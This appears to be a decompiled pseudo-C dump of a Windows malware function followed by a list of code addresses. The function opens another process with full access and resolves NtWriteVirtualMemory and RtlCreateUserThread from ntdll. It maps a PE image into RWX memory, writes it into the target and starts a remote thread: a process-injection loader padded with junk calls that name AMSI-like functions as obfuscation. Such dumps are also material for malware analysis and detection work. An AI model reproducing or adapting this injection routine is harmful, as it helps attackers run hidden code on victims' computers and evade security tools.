				char _v380;
				char _v384;
				char _v388;
				intOrPtr _v392;
				char _v396;
				char _v400;
				char _v404;
				intOrPtr _v408;
				char _v412;
				char _v416;
				char _v420;
				intOrPtr _v424;
				char _v428;
				char _v432;
				char _v436;
				intOrPtr _v440;
				char _v444;
				char _v448;
				char _v452;
				intOrPtr _v456;
				char _v460;
				char _v464;
				char _v468;
				intOrPtr _v472;
				char _v476;
				char _v480;
				char _v484;
				intOrPtr _v488;
				char _v492;
				char _v496;
				char _v500;
				intOrPtr _v504;
				char _v508;
				char _v512;
				char _v516;
				intOrPtr _v520;
				char _v524;
				char _v528;
				char _v532;
				intOrPtr _v536;
				char _v540;
				char _v544;
				char _v548;
				intOrPtr _v552;
				char _v556;
				char _v560;
				char _v564;
				intOrPtr _v568;
				char _v572;
				char _v576;
				char _v580;
				intOrPtr _v584;
				char _v588;
				char _v592;
				char _v596;
				intOrPtr _v600;
				char _v604;
				char _v608;
				char _v612;
				intOrPtr _v616;
				char _v620;
				char _v624;
				char _v628;
				intOrPtr _v632;
				char _v636;
				char _v640;
				char _v644;
				intOrPtr _v648;
				char _v652;
				char _v656;
				char _v660;
				intOrPtr _v664;
				char _v668;
				char _v672;
				char _v676;
				intOrPtr _v680;
				char _v684;
				char _v688;
				char _v692;
				intOrPtr _v696;
				char _v700;
				char _v704;
				char _v708;
				intOrPtr _v712;
				char _v716;
				char _v720;
				char _v724;
				intOrPtr _v728;
				char _v732;
				char _v736;
				char _v740;
				intOrPtr _v744;
				char _v748;
				char _v752;
				char _v756;
				intOrPtr _v760;
				char _v764;
				char _v768;
				char _v772;
				intOrPtr _v776;
				char _v780;
				char _v784;
				char _v788;
				intOrPtr _v792;
				char _v796;
				char _v800;
				intOrPtr _t533;
				intOrPtr* _t535;
				intOrPtr _t536;
				intOrPtr _t539;
				intOrPtr _t540;
				void* _t681;
				void* _t735;
				intOrPtr _t745;
				intOrPtr _t746;
				intOrPtr _t748;
				intOrPtr _t793;
				intOrPtr _t880;
				intOrPtr _t881;
				signed short _t899;
				intOrPtr _t904;
				void* _t907;
				intOrPtr _t923;
				intOrPtr _t969;
				_Unknown_base(*)()* _t1059;
				intOrPtr _t1102;
				intOrPtr _t1103;
				intOrPtr _t1104;
				intOrPtr _t1105;
				_Unknown_base(*)()** _t1107;
				_Unknown_base(*)()* _t1125;
				intOrPtr _t1198;
				intOrPtr _t1199;
				_Unknown_base(*)()** _t1201;
				void* _t1218;
				intOrPtr _t1221;
				short _t1225;
				intOrPtr _t1226;
				intOrPtr _t1227;
				intOrPtr _t1228;
				intOrPtr _t1246;
				void* _t1250;
				intOrPtr _t1291;
				void* _t1321;
				void* _t1326;
				void* _t1331;
				void* _t1336;
				void* _t1341;
				void* _t1346;
				void* _t1351;
				void* _t1359;
				void* _t1364;
				void* _t1369;
				void* _t1374;
				void* _t1379;
				void* _t1392;
				void* _t1397;
				void* _t1402;
				intOrPtr _t1403;
				void* _t1411;
				void* _t1416;
				void* _t1421;
				signed int _t1425;
				void* _t1431;
				void* _t1436;
				void* _t1441;
				void* _t1446;
				void* _t1451;
				void* _t1456;
				void* _t1461;
				void* _t1466;
				void* _t1471;
				void* _t1476;
				void* _t1482;
				void* _t1487;
				void* _t1492;
				void* _t1497;
				void* _t1502;
				void* _t1507;
				void* _t1512;
				void* _t1517;
				void* _t1522;
				void* _t1527;
				_Unknown_base(*)()** _t1528;
				void* _t1533;
				void* _t1538;
				void* _t1543;
				void* _t1548;
				_Unknown_base(*)()** _t1549;
				void* _t1554;
				void* _t1559;
				void* _t1564;
				void* _t1569;
				void* _t1574;
				void* _t1579;
				intOrPtr _t1582;
				void* _t1589;
				void* _t1592;
				intOrPtr _t1596;
				intOrPtr _t1597;
				short _t1609;
				void* _t1612;

				_t1596 = _t1597;
				_t1250 = 0x63;
				do {
					_push(0);
					_push(0);
					_t1250 = _t1250 - 1;
					_t1598 = _t1250;
				} while (_t1250 != 0);
				_push(_t1250);
				_push(_t1596);
				_push(0x32bc06a);
				_push( *[fs:eax]);
				 *[fs:eax] = _t1597;
				E032A44F4(0x32de544, 0x32bc088);
				_push(0x32bc094);
				_push( *0x32de544);
				_push("OpenSession");
				E032A4824();
				E032A4698( &_v20, E032A4964(_v24));
				_push(_v20);
				E032A47B0( &_v32,  *0x32de544, 0x32bc094);
				E032A4698( &_v28, E032A4964(_v32));
				_pop(_t1321);
				E032B7C04(_v28,  *0x32de544, _t1321, _t1598);
				_push(0x32bc094);
				_push( *0x32de544);
				_push("Initialize");
				E032A4824();
				E032A4698( &_v36, E032A4964(_v40));
				_push(_v36);
				E032A47B0( &_v48,  *0x32de544, 0x32bc094);
				E032A4698( &_v44, E032A4964(_v48));
				_pop(_t1326);
				E032B7C04(_v44,  *0x32de544, _t1326, _t1598);
				_push(0x32bc094);
				_push( *0x32de544);
				_push("ScanString");
				E032A4824();
				E032A4698( &_v52, E032A4964(_v56));
				_push(_v52);
				E032A47B0( &_v64,  *0x32de544, 0x32bc094);
				E032A4698( &_v60, E032A4964(_v64));
				_pop(_t1331);
				E032B7C04(_v60,  *0x32de544, _t1331, _t1598);
				_v5 = 0;
				_push(0x32bc094);
				_push( *0x32de544);
				_push("UacInitialize");
				E032A4824();
				E032A4698( &_v68, E032A4964(_v72));
				_push(_v68);
				E032A47B0( &_v80,  *0x32de544, 0x32bc094);
				E032A4698( &_v76, E032A4964(_v80));
				_pop(_t1336);
				E032B7C04(_v76,  *0x32de544, _t1336, _t1598);
				_push(0x32bc094);
				_push( *0x32de544);
				_push("ScanString");
				E032A4824();
				E032A4698( &_v84, E032A4964(_v88));
				_push(_v84);
				E032A47B0( &_v96,  *0x32de544, 0x32bc094);
				E032A4698( &_v92, E032A4964(_v96));
				_pop(_t1341);
				E032B7C04(_v92,  *0x32de544, _t1341, _t1598);
				_push(0x32bc094);
				_push( *0x32de544);
				_push("UacInitialize");
				E032A4824();
				E032A4698( &_v100, E032A4964(_v104));
				_push(_v100);
				E032A47B0( &_v112,  *0x32de544, 0x32bc094);
				E032A4698( &_v108, E032A4964(_v112));
				_pop(_t1346);
				E032B7C04(_v108,  *0x32de544, _t1346, _t1598);
				_push(0x32bc094);
				_push( *0x32de544);
				_push("ScanBuffer");
				E032A4824();
				E032A4698( &_v116, E032A4964(_v120));
				_push(_v116);
				E032A47B0( &_v128,  *0x32de544, 0x32bc094);
				E032A4698( &_v124, E032A4964(_v128));
				_pop(_t1351);
				E032B7C04(_v124,  *0x32de544, _t1351, _t1598);
				_t533 =  *0x32da798; // 0x32de324
				E032B7AE4(_t533, 0, 0, 0, 0);
				_t535 =  *0x32da96c; // 0x32de33c
				 *_t535 = _a8;
				_t536 =  *0x32da96c; // 0x32de33c
				 *((intOrPtr*)(_t536 + 4)) = 0;
				 *0x32de510 = GetProcAddress(GetModuleHandleW(L"C:\\Windows\\System32\\ntdll.dll"), "NtOpenProcess");
				_t539 =  *0x32da96c; // 0x32de33c
				_t540 =  *0x32da798; // 0x32de324
				 *0x32de510(0x32de53c, 0x1f0fff, _t540, _t539);
				_push(0x32bc094);
				_push( *0x32de544);
				_push("Initialize");
				E032A4824();
				E032A4698( &_v132, E032A4964(_v136));
				_push(_v132);
				E032A47B0( &_v144,  *0x32de544, 0x32bc094);
				E032A4698( &_v140, E032A4964(_v144));
				_pop(_t1359);
				E032B7C04(_v140,  *0x32de544, _t1359, _t1598);
				_push(0x32bc094);
				_push( *0x32de544);
				_push("ScanString");
				E032A4824();
				E032A4698( &_v148, E032A4964(_v152));
				_push(_v148);
				E032A47B0( &_v160,  *0x32de544, 0x32bc094);
				E032A4698( &_v156, E032A4964(_v160));
				_pop(_t1364);
				E032B7C04(_v156,  *0x32de544, _t1364, _t1598);
				E032A2EE0();
				 *0x32de548 = (E032A2F08(9) + 1) * 0x5f5e100;
				_push(0x32bc094);
				_push( *0x32de544);
				_push("OpenSession");
				E032A4824();
				E032A4698( &_v164, E032A4964(_v168));
				_push(_v164);
				E032A47B0( &_v176,  *0x32de544, 0x32bc094);
				E032A4698( &_v172, E032A4964(_v176));
				_pop(_t1369);
				E032B7C04(_v172,  *0x32de544, _t1369, _t1598);
				_push(0x32bc094);
				_push( *0x32de544);
				_push("Initialize");
				E032A4824();
				E032A4698( &_v180, E032A4964(_v184));
				_push(_v180);
				E032A47B0( &_v192,  *0x32de544, 0x32bc094);
				E032A4698( &_v188, E032A4964(_v192));
				_pop(_t1374);
				E032B7C04(_v188,  *0x32de544, _t1374, _t1598);
				_push(0x32bc094);
				_push( *0x32de544);
				_push("ScanString");
				E032A4824();
				E032A4698( &_v196, E032A4964(_v200));
				_push(_v196);
				E032A47B0( &_v208,  *0x32de544, 0x32bc094);
				E032A4698( &_v204, E032A4964(_v208));
				_pop(_t1379);
				E032B7C04(_v204,  *0x32de544, _t1379, _t1598);
				_t1599 =  *0x32de53c;
				if( *0x32de53c == 0) {
					L21:
					E032B7B14( *0x32de53c, "BCryptVerifySignature");
					E032B7B14( *0x32de53c, "BCryptQueryProviderRegistration");
					E032B7B14( *0x32de53c, "BCryptRegisterProvider");
					E032B7B14( *0x32de53c, "NtReadVirtualMemory");
					E032B7B14( *0x32de53c, "NtOpenObjectAuditAlarm");
					E032B7B14( *0x32de53c, "I_QueryTagInformation");
					E032B7B14( *0x32de53c, "NtSetSecurityObject");
					E032B7B14( *0x32de53c, "NtOpenProcess");
					_push(0x32bc094);
					_push( *0x32de544);
					_push("UacInitialize");
					E032A4824();
					E032A4698( &_v756, E032A4964(_v760));
					_push(_v756);
					E032A47B0( &_v768,  *0x32de544, 0x32bc094);
					E032A4698( &_v764, E032A4964(_v768));
					_pop(_t1392);
					E032B7C04(_v764,  *0x32de544, _t1392, _t1613);
					_push(0x32bc094);
					_push( *0x32de544);
					_push("ScanString");
					E032A4824();
					E032A4698( &_v772, E032A4964(_v776));
					_push(_v772);
					E032A47B0( &_v784,  *0x32de544, 0x32bc094);
					E032A4698( &_v780, E032A4964(_v784));
					_pop(_t1397);
					E032B7C04(_v780,  *0x32de544, _t1397, _t1613);
					_push(0x32bc094);
					_push( *0x32de544);
					_push("OpenSession");
					E032A4824();
					E032A4698( &_v788, E032A4964(_v792));
					_push(_v788);
					E032A47B0( &_v800,  *0x32de544, 0x32bc094);
					E032A4698( &_v796, E032A4964(_v800));
					_pop(_t1402);
					E032B7C04(_v796,  *0x32de544, _t1402, _t1613);
					_pop(_t1403);
					 *[fs:eax] = _t1403;
					_push(0x32bc071);
					E032A44C4( &_v800, 0x64);
					return E032A44C4( &_v400, 0x60);
				}
				_t681 =  *((intOrPtr*)( *_a4))();
				 *0x32de530 = E032B79BC(GetCurrentProcess(), 0, _t681, 0x3000, 0x40);
				_push(0x32bc094);
				_push( *0x32de544);
				_push("ScanBuffer");
				E032A4824();
				E032A4698( &_v212, E032A4964(_v216));
				_push(_v212);
				E032A47B0( &_v224,  *0x32de544, 0x32bc094);
				E032A4698( &_v220, E032A4964(_v224));
				_pop(_t1411);
				E032B7C04(_v220,  *0x32de544, _t1411, _t1599);
				_push(0x32bc094);
				_push( *0x32de544);
				_push("UacInitialize");
				E032A4824();
				E032A4698( &_v228, E032A4964(_v232));
				_push(_v228);
				E032A47B0( &_v240,  *0x32de544, 0x32bc094);
				E032A4698( &_v236, E032A4964(_v240));
				_pop(_t1416);
				E032B7C04(_v236,  *0x32de544, _t1416, _t1599);
				_push(0x32bc094);
				_push( *0x32de544);
				_push("OpenSession");
				E032A4824();
				E032A4698( &_v244, E032A4964(_v248));
				_push(_v244);
				E032A47B0( &_v256,  *0x32de544, 0x32bc094);
				E032A4698( &_v252, E032A4964(_v256));
				_pop(_t1421);
				E032B7C04(_v252,  *0x32de544, _t1421, _t1599);
				if( *0x32de530 == 0) {
					goto L21;
				}
				E032B58D8(_a4, 0, 0);
				 *((intOrPtr*)( *_a4))();
				 *((intOrPtr*)( *_a4 + 0xc))();
				_t1592 =  *0x32de530; // 0x0
				if(IsBadReadPtr(_t1592, 0x40) != 0 ||  *_t1592 != 0x5a4d) {
					L20:
					_push( *((intOrPtr*)( *_a4))(0x4000));
					_t735 =  *0x32de530; // 0x0
					_push(_t735);
					_push(GetCurrentProcess());
					L032B79B4();
					goto L21;
				} else {
					_v12 =  *((intOrPtr*)(_t1592 + 0x3c)) +  *0x32de530;
					if(IsBadReadPtr(_v12, 0xf8) != 0 ||  *_v12 != 0x4550) {
						goto L20;
					} else {
						 *0x32de524 = _v12 + 0xf8;
						_t1425 =  *0x32de548; // 0x0
						 *0x32de52c = _t1425 -  *((intOrPtr*)(_v12 + 0x50));
						_t1605 =  *0x32de52c;
						if( *0x32de52c == 0) {
							L19:
							_push(0x4000);
							_t745 =  *0x32de52c; // 0x0
							_push(_t745);
							_t746 =  *0x32de534; // 0x0
							_push(_t746);
							_push(GetCurrentProcess());
							L032B79B4();
							goto L20;
						}
						_t748 =  *0x32de52c; // 0x0
						 *0x32de534 = E032B79BC(GetCurrentProcess(), 0, _t748, 0x3000, 0x40);
						_push(0x32bc094);
						_push( *0x32de544);
						_push("ScanBuffer");
						E032A4824();
						E032A4698( &_v260, E032A4964(_v264));
						_push(_v260);
						E032A47B0( &_v272,  *0x32de544, 0x32bc094);
						E032A4698( &_v268, E032A4964(_v272));
						_pop(_t1431);
						E032B7C04(_v268,  *0x32de544, _t1431, _t1605);
						_push(0x32bc094);
						_push( *0x32de544);
						_push("UacInitialize");
						E032A4824();
						E032A4698( &_v276, E032A4964(_v280));
						_push(_v276);
						E032A47B0( &_v288,  *0x32de544, 0x32bc094);
						E032A4698( &_v284, E032A4964(_v288));
						_pop(_t1436);
						E032B7C04(_v284,  *0x32de544, _t1436, _t1605);
						_push(0x32bc094);
						_push( *0x32de544);
						_push("OpenSession");
						E032A4824();
						E032A4698( &_v292, E032A4964(_v296));
						_push(_v292);
						E032A47B0( &_v304,  *0x32de544, 0x32bc094);
						E032A4698( &_v300, E032A4964(_v304));
						_pop(_t1441);
						E032B7C04(_v300,  *0x32de544, _t1441, _t1605);
						_t1606 =  *0x32de534;
						if( *0x32de534 == 0) {
							goto L19;
						}
						_t793 =  *0x32de52c; // 0x0
						 *0x32de538 = E032B79BC( *0x32de53c, 0, _t793, 0x3000, 0x40);
						_push(0x32bc094);
						_push( *0x32de544);
						_push("ScanBuffer");
						E032A4824();
						E032A4698( &_v308, E032A4964(_v312));
						_push(_v308);
						E032A47B0( &_v320,  *0x32de544, 0x32bc094);
						E032A4698( &_v316, E032A4964(_v320));
						_pop(_t1446);
						E032B7C04(_v316,  *0x32de544, _t1446, _t1606);
						_push(0x32bc094);
						_push( *0x32de544);
						_push("UacInitialize");
						E032A4824();
						E032A4698( &_v324, E032A4964(_v328));
						_push(_v324);
						E032A47B0( &_v336,  *0x32de544, 0x32bc094);
						E032A4698( &_v332, E032A4964(_v336));
						_pop(_t1451);
						E032B7C04(_v332,  *0x32de544, _t1451, _t1606);
						_push(0x32bc094);
						_push( *0x32de544);
						_push("OpenSession");
						E032A4824();
						E032A4698( &_v340, E032A4964(_v344));
						_push(_v340);
						E032A47B0( &_v352,  *0x32de544, 0x32bc094);
						E032A4698( &_v348, E032A4964(_v352));
						_pop(_t1456);
						E032B7C04(_v348,  *0x32de544, _t1456, _t1606);
						_t1607 =  *0x32de538;
						if( *0x32de538 == 0) {
							_push(0x32bc094);
							_push( *0x32de544);
							_push("UacInitialize");
							E032A4824();
							E032A4698( &_v708, E032A4964(_v712));
							_push(_v708);
							E032A47B0( &_v720,  *0x32de544, 0x32bc094);
							E032A4698( &_v716, E032A4964(_v720));
							_pop(_t1461);
							E032B7C04(_v716,  *0x32de544, _t1461, __eflags);
							_push(0x32bc094);
							_push( *0x32de544);
							_push("ScanString");
							E032A4824();
							E032A4698( &_v724, E032A4964(_v728));
							_push(_v724);
							E032A47B0( &_v736,  *0x32de544, 0x32bc094);
							E032A4698( &_v732, E032A4964(_v736));
							_pop(_t1466);
							E032B7C04(_v732,  *0x32de544, _t1466, __eflags);
							_push(0x32bc094);
							_push( *0x32de544);
							_push("OpenSession");
							E032A4824();
							E032A4698( &_v740, E032A4964(_v744));
							_push(_v740);
							E032A47B0( &_v752,  *0x32de544, 0x32bc094);
							E032A4698( &_v748, E032A4964(_v752));
							_pop(_t1471);
							E032B7C04(_v748,  *0x32de544, _t1471, __eflags);
							_push(0x4000);
							_t880 =  *0x32de52c; // 0x0
							_push(_t880);
							_t881 =  *0x32de538; // 0x0
							_push(_t881);
							_push( *0x32de53c);
							L032B79B4();
							goto L19;
						}
						_push(0x32bc094);
						_push( *0x32de544);
						_push("ScanBuffer");
						E032A4824();
						E032A4698( &_v356, E032A4964(_v360));
						_push(_v356);
						E032A47B0( &_v368,  *0x32de544, 0x32bc094);
						E032A4698( &_v364, E032A4964(_v368));
						_pop(_t1476);
						E032B7C04(_v364,  *0x32de544, _t1476, _t1607);
						 *0x32de528 =  *(_v12 + 6) & 0x0000ffff;
						_t1291 =  *0x32de524; // 0x0
						_t899 =  *0x32de528; // 0x0
						_t904 =  *0x32de534; // 0x0
						E032BA580(_t904, _t1291 - _t1592 + _t899 + _t899 + _t899 + _t899 + _t899 + _t899 + _t899 + _t899 + (_t899 + _t899 + _t899 + _t899 + _t899 + _t899 + _t899 + _t899) * 4, _t1592);
						_t907 = ( *0x32de528 & 0x0000ffff) - 1;
						if(_t907 < 0) {
							L14:
							_push(0x32bc094);
							_push( *0x32de544);
							_push("UacScan");
							E032A4824();
							E032A4698( &_v388, E032A4964(_v392));
							_push(_v388);
							E032A47B0( &_v400,  *0x32de544, 0x32bc094);
							E032A4698( &_v396, E032A4964(_v400));
							_pop(_t1482);
							E032B7C04(_v396,  *0x32de544, _t1482, _t1610);
							_t923 =  *((intOrPtr*)(_v12 + 0xa0));
							if(_t923 != 0) {
								_t1582 =  *0x32de538; // 0x0
								_t1612 = _t923 +  *0x32de534;
								_t1221 =  *0x32de534; // 0x0
								E032BA4D0( *((intOrPtr*)(_v12 + 0x34)), _t1221, _t923 +  *0x32de534, _t1582,  *((intOrPtr*)(_v12 + 0xa4)));
							}
							_push(0x32bc094);
							_push( *0x32de544);
							_push("UacInitialize");
							E032A4824();
							E032A4698( &_v404, E032A4964(_v408));
							_push(_v404);
							E032A47B0( &_v416,  *0x32de544, 0x32bc094);
							E032A4698( &_v412, E032A4964(_v416));
							_pop(_t1487);
							E032B7C04(_v412,  *0x32de544, _t1487, _t1612);
							_push(0x32bc094);
							_push( *0x32de544);
							_push("OpenSession");
							E032A4824();
							E032A4698( &_v420, E032A4964(_v424));
							_push(_v420);
							E032A47B0( &_v432,  *0x32de544, 0x32bc094);
							E032A4698( &_v428, E032A4964(_v432));
							_pop(_t1492);
							E032B7C04(_v428,  *0x32de544, _t1492, _t1612);
							_push(0x32bc094);
							_push( *0x32de544);
							_push("ScanBuffer");
							E032A4824();
							E032A4698( &_v436, E032A4964(_v440));
							_push(_v436);
							E032A47B0( &_v448,  *0x32de544, 0x32bc094);
							E032A4698( &_v444, E032A4964(_v448));
							_pop(_t1497);
							E032B7C04(_v444,  *0x32de544, _t1497, _t1612);
							_t969 =  *0x32de534; // 0x0
							E032BA58C(_t969,  *((intOrPtr*)(_v12 + 0x80)) +  *0x32de534);
							_push(0x32bc094);
							_push( *0x32de544);
							_push("UacInitialize");
							E032A4824();
							E032A4698( &_v452, E032A4964(_v456));
							_push(_v452);
							E032A47B0( &_v464,  *0x32de544, 0x32bc094);
							E032A4698( &_v460, E032A4964(_v464));
							_pop(_t1502);
							E032B7C04(_v460,  *0x32de544, _t1502, _t1612);
							_push(0x32bc094);
							_push( *0x32de544);
							_push("OpenSession");
							E032A4824();
							E032A4698( &_v468, E032A4964(_v472));
							_push(_v468);
							E032A47B0( &_v480,  *0x32de544, 0x32bc094);
							E032A4698( &_v476, E032A4964(_v480));
							_pop(_t1507);
							E032B7C04(_v476,  *0x32de544, _t1507, _t1612);
							_push(0x32bc094);
							_push( *0x32de544);
							_push("ScanBuffer");
							E032A4824();
							E032A4698( &_v484, E032A4964(_v488));
							_push(_v484);
							E032A47B0( &_v496,  *0x32de544, 0x32bc094);
							E032A4698( &_v492, E032A4964(_v496));
							_pop(_t1512);
							E032B7C04(_v492,  *0x32de544, _t1512, _t1612);
							 *0x32de520 =  *((intOrPtr*)(_v12 + 0x28)) +  *0x32de538;
							_push(0x32bc094);
							_push( *0x32de544);
							_push("ScanString");
							E032A4824();
							E032A4698( &_v500, E032A4964(_v504));
							_push(_v500);
							E032A47B0( &_v512,  *0x32de544, 0x32bc094);
							E032A4698( &_v508, E032A4964(_v512));
							_pop(_t1517);
							E032B7C04(_v508,  *0x32de544, _t1517, _t1612);
							_push(0x32bc094);
							_push( *0x32de544);
							_push("UacInitialize");
							E032A4824();
							E032A4698( &_v516, E032A4964(_v520));
							_push(_v516);
							E032A47B0( &_v528,  *0x32de544, 0x32bc094);
							E032A4698( &_v524, E032A4964(_v528));
							_pop(_t1522);
							E032B7C04(_v524,  *0x32de544, _t1522, _t1612);
							_push(0x32bc094);
							_push( *0x32de544);
							_push("ScanBuffer");
							E032A4824();
							E032A4698( &_v532, E032A4964(_v536));
							_push(_v532);
							E032A47B0( &_v544,  *0x32de544, 0x32bc094);
							E032A4698( &_v540, E032A4964(_v544));
							_pop(_t1527);
							E032B7C04(_v540,  *0x32de544, _t1527, _t1612);
							_t1059 = GetProcAddress(GetModuleHandleW(L"C:\\Windows\\System32\\ntdll.dll"), "NtWriteVirtualMemory");
							_t1528 =  *0x32da888; // 0x32de320
							 *_t1528 = _t1059;
							_push(0x32bc094);
							_push( *0x32de544);
							_push("UacInitialize");
							E032A4824();
							E032A4698( &_v548, E032A4964(_v552));
							_push(_v548);
							E032A47B0( &_v560,  *0x32de544, 0x32bc094);
							E032A4698( &_v556, E032A4964(_v560));
							_pop(_t1533);
							E032B7C04(_v556,  *0x32de544, _t1533, _t1612);
							_push(0x32bc094);
							_push( *0x32de544);
							_push("OpenSession");
							E032A4824();
							E032A4698( &_v564, E032A4964(_v568));
							_push(_v564);
							E032A47B0( &_v576,  *0x32de544, 0x32bc094);
							E032A4698( &_v572, E032A4964(_v576));
							_pop(_t1538);
							E032B7C04(_v572,  *0x32de544, _t1538, _t1612);
							_push(0x32bc094);
							_push( *0x32de544);
							_push("ScanBuffer");
							E032A4824();
							E032A4698( &_v580, E032A4964(_v584));
							_push(_v580);
							E032A47B0( &_v592,  *0x32de544, 0x32bc094);
							E032A4698( &_v588, E032A4964(_v592));
							_pop(_t1543);
							E032B7C04(_v588,  *0x32de544, _t1543, _t1612);
							_t1102 =  *0x32de540; // 0x0
							_t1103 =  *0x32de52c; // 0x0
							_t1104 =  *0x32de534; // 0x0
							_t1105 =  *0x32de538; // 0x0
							_t1107 =  *0x32da888; // 0x32de320
							 *( *_t1107)( *0x32de53c, _t1105, _t1104, _t1103, _t1102);
							_push(0x32bc094);
							_push( *0x32de544);
							_push("ScanBuffer");
							E032A4824();
							E032A4698( &_v596, E032A4964(_v600));
							_push(_v596);
							E032A47B0( &_v608,  *0x32de544, 0x32bc094);
							E032A4698( &_v604, E032A4964(_v608));
							_pop(_t1548);
							E032B7C04(_v604,  *0x32de544, _t1548, _t1612);
							_t1125 = GetProcAddress(GetModuleHandleW(L"C:\\Windows\\System32\\ntdll.dll"), "RtlCreateUserThread");
							_t1549 =  *0x32da808; // 0x32de314
							 *_t1549 = _t1125;
							 *0x32de518 = 0;
							 *0x32de51c = 0;
							_push(0x32bc094);
							_push( *0x32de544);
							_push("UacInitialize");
							E032A4824();
							E032A4698( &_v612, E032A4964(_v616));
							_push(_v612);
							E032A47B0( &_v624,  *0x32de544, 0x32bc094);
							E032A4698( &_v620, E032A4964(_v624));
							_pop(_t1554);
							E032B7C04(_v620,  *0x32de544, _t1554, _t1612);
							_push(0x32bc094);
							_push( *0x32de544);
							_push("ScanString");
							E032A4824();
							E032A4698( &_v628, E032A4964(_v632));
							_push(_v628);
							E032A47B0( &_v640,  *0x32de544, 0x32bc094);
							E032A4698( &_v636, E032A4964(_v640));
							_pop(_t1559);
							E032B7C04(_v636,  *0x32de544, _t1559, _t1612);
							_push(0x32bc094);
							_push( *0x32de544);
							_push("OpenSession");
							E032A4824();
							E032A4698( &_v644, E032A4964(_v648));
							_push(_v644);
							E032A47B0( &_v656,  *0x32de544, 0x32bc094);
							E032A4698( &_v652, E032A4964(_v656));
							_pop(_t1564);
							E032B7C04(_v652,  *0x32de544, _t1564, _t1612);
							_push(0x32bc094);
							_push( *0x32de544);
							_push("UacInitialize");
							E032A4824();
							E032A4698( &_v660, E032A4964(_v664));
							_push(_v660);
							E032A47B0( &_v672,  *0x32de544, 0x32bc094);
							E032A4698( &_v668, E032A4964(_v672));
							_pop(_t1569);
							E032B7C04(_v668,  *0x32de544, _t1569, _t1612);
							_push(0x32bc094);
							_push( *0x32de544);
							_push("ScanBuffer");
							E032A4824();
							E032A4698( &_v676, E032A4964(_v680));
							_push(_v676);
							E032A47B0( &_v688,  *0x32de544, 0x32bc094);
							E032A4698( &_v684, E032A4964(_v688));
							_pop(_t1574);
							E032B7C04(_v684,  *0x32de544, _t1574, _t1612);
							_t1198 =  *0x32de51c; // 0x0
							_t1199 =  *0x32de520; // 0x0
							_t1201 =  *0x32da808; // 0x32de314
							 *( *_t1201)( *0x32de53c, 0, 0, 0, 0, 0, _t1199, 0, 0x32de518, _t1198);
							_push(0x32bc094);
							_push( *0x32de544);
							_push("ScanBuffer");
							E032A4824();
							E032A4698( &_v692, E032A4964(_v696));
							_push(_v692);
							E032A47B0( &_v704,  *0x32de544, 0x32bc094);
							E032A4698( &_v700, E032A4964(_v704));
							_pop(_t1579);
							E032B7C04(_v700,  *0x32de544, _t1579, _t1612);
							_t1613 =  *0x32de518;
							if( *0x32de518 != 0) {
								_v5 = 1;
								_t1218 =  *0x32de518; // 0x0
								CloseHandle(_t1218);
							}
							goto L19;
						}
						_t1225 = _t907 + 1;
						_t1609 = _t1225;
						_v14 = _t1225;
						do {
							_t1226 =  *0x32de524; // 0x0
							_t1227 =  *0x32de524; // 0x0
							_t1228 =  *0x32de524; // 0x0
							E032BA580( *((intOrPtr*)(_t1228 + 0xc)) +  *0x32de534,  *((intOrPtr*)(_t1226 + 0x10)),  *((intOrPtr*)(_t1227 + 0x14)) +  *0x32de530);
							_push(0x32bc094);
							_push( *0x32de544);
							_push("ScanBuffer");
							E032A4824();
							E032A4698( &_v372, E032A4964(_v376));
							_push(_v372);
							E032A47B0( &_v384,  *0x32de544, 0x32bc094);
							E032A4698( &_v380, E032A4964(_v384));
							_pop(_t1589);
							E032B7C04(_v380,  *0x32de544, _t1589, _t1609);
							_t1246 =  *0x32de524; // 0x0
							 *0x32de524 = _t1246 + 0x28;
							_t208 =  &_v14;
							 *_t208 = _v14 - 1;
							_t1610 =  *_t208;
						} while ( *_t208 != 0);
						goto L14;
					}
				}
			}

0x032ba6f5
0x032ba6f7
0x032ba6fc
0x032ba6fc
0x032ba6fe
0x032ba700
0x032ba700
0x032ba700
0x032ba703
0x032ba713
0x032ba714
0x032ba719
0x032ba71c
0x032ba726
0x032ba72b
0x032ba730
0x032ba732
0x032ba73f
0x032ba751
0x032ba759
0x032ba764
0x032ba776
0x032ba77e
0x032ba77f
0x032ba784
0x032ba789
0x032ba78b
0x032ba798
0x032ba7aa
0x032ba7b2
0x032ba7bd
0x032ba7cf
0x032ba7d7
0x032ba7d8
0x032ba7dd
0x032ba7e2
0x032ba7e4
0x032ba7f1
0x032ba803
0x032ba80b
0x032ba816
0x032ba828
0x032ba830
0x032ba831
0x032ba836
0x032ba83a
0x032ba83f
0x032ba841
0x032ba84e
0x032ba860
0x032ba868
0x032ba873
0x032ba885
0x032ba88d
0x032ba88e
0x032ba893
0x032ba898
0x032ba89a
0x032ba8a7
0x032ba8b9
0x032ba8c1
0x032ba8cc
0x032ba8de
0x032ba8e6
0x032ba8e7
0x032ba8ec
0x032ba8f1
0x032ba8f3
0x032ba900
0x032ba912
0x032ba91a
0x032ba925
0x032ba937
0x032ba93f
0x032ba940
0x032ba945
0x032ba94a
0x032ba94c
0x032ba959
0x032ba96b
0x032ba973
0x032ba97e
0x032ba990
0x032ba998
0x032ba999
0x032ba9a2
0x032ba9ab
0x032ba9b0
0x032ba9b8
0x032ba9ba
0x032ba9c1
0x032ba9d9
0x032ba9de
0x032ba9e4
0x032ba9f0
0x032ba9f6
0x032ba9fb
0x032ba9fd
0x032baa0d
0x032baa22
0x032baa2a
0x032baa38
0x032baa50
0x032baa5b
0x032baa5c
0x032baa61
0x032baa66
0x032baa68
0x032baa78
0x032baa90
0x032baa9b
0x032baaa9
0x032baac1
0x032baacc
0x032baacd
0x032baad2
0x032baae8
0x032baaed
0x032baaf2
0x032baaf4
0x032bab04
0x032bab1c
0x032bab27
0x032bab35
0x032bab4d
0x032bab58
0x032bab59
0x032bab5e
0x032bab63
0x032bab65
0x032bab75
0x032bab8d
0x032bab98
0x032baba6
0x032babbe
0x032babc9
0x032babca
0x032babcf
0x032babd4
0x032babd6
0x032babe6
0x032babfe
0x032bac09
0x032bac17
0x032bac2f
0x032bac3a
0x032bac3b
0x032bac40
0x032bac43
0x032bbe61
0x032bbe6d
0x032bbe7e
0x032bbe8f
0x032bbea0
0x032bbeb1
0x032bbec2
0x032bbed3
0x032bbee4
0x032bbee9
0x032bbeee
0x032bbef0
0x032bbf00
0x032bbf18
0x032bbf23
0x032bbf31
0x032bbf49
0x032bbf54
0x032bbf55
0x032bbf5a
0x032bbf5f
0x032bbf61
0x032bbf71
0x032bbf89
0x032bbf94
0x032bbfa2
0x032bbfba
0x032bbfc5
0x032bbfc6
0x032bbfcb
0x032bbfd0
0x032bbfd2
0x032bbfe2
0x032bbffa
0x032bc005
0x032bc013
